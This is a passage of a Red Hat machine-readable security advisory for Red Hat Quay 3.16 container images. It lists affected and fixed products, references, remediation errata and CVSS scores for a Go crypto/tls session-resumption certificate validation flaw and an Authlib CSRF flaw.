"text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T15:17:12+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"
},
{
"cve": "CVE-2025-68158",
"cwe": {
"id": "CWE-352",
"name": "Cross-Site Request Forgery (CSRF)"
},
"discovery_date": "2026-01-08T19:01:41.615962+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2428102"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect servers. The cache-backed state and request-token storage within Authlib is not securely linked to the user\u0027s initiating session. This vulnerability allows a remote attacker to exploit a Cross-Site Request Forgery (CSRF) by obtaining a valid state, which can lead to unauthorized actions being performed on behalf of the user.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Authlib: Authlib: Cross-Site Request Forgery due to improper session management in state storage",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Moderate for Red Hat products utilizing Authlib, such as Red Hat Ansible Automation Platform, Hosted OpenShift Clusters, Red Hat Quay, and Red Hat Satellite. The flaw arises from improper session management in Authlib\u0027s cache-backed state storage, allowing a remote attacker to perform Cross-Site Request Forgery (CSRF) by obtaining a valid state.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68158"
},
{
"category": "external",
"summary": "RHBZ#2428102",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428102"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68158"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68158",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68158"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/2808378611dd6fb2532b189a9087877d8f0c0489",
"url": "https://github.com/authlib/authlib/commit/2808378611dd6fb2532b189a9087877d8f0c0489"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/7974f45e4d7492ab5f527577677f2770ce423228",
"url": "https://github.com/authlib/authlib/commit/7974f45e4d7492ab5f527577677f2770ce423228"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-fg6f-75jq-6523",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-fg6f-75jq-6523"
}
],
"release_date": "2026-01-08T17:58:17.724000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T15:17:12+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
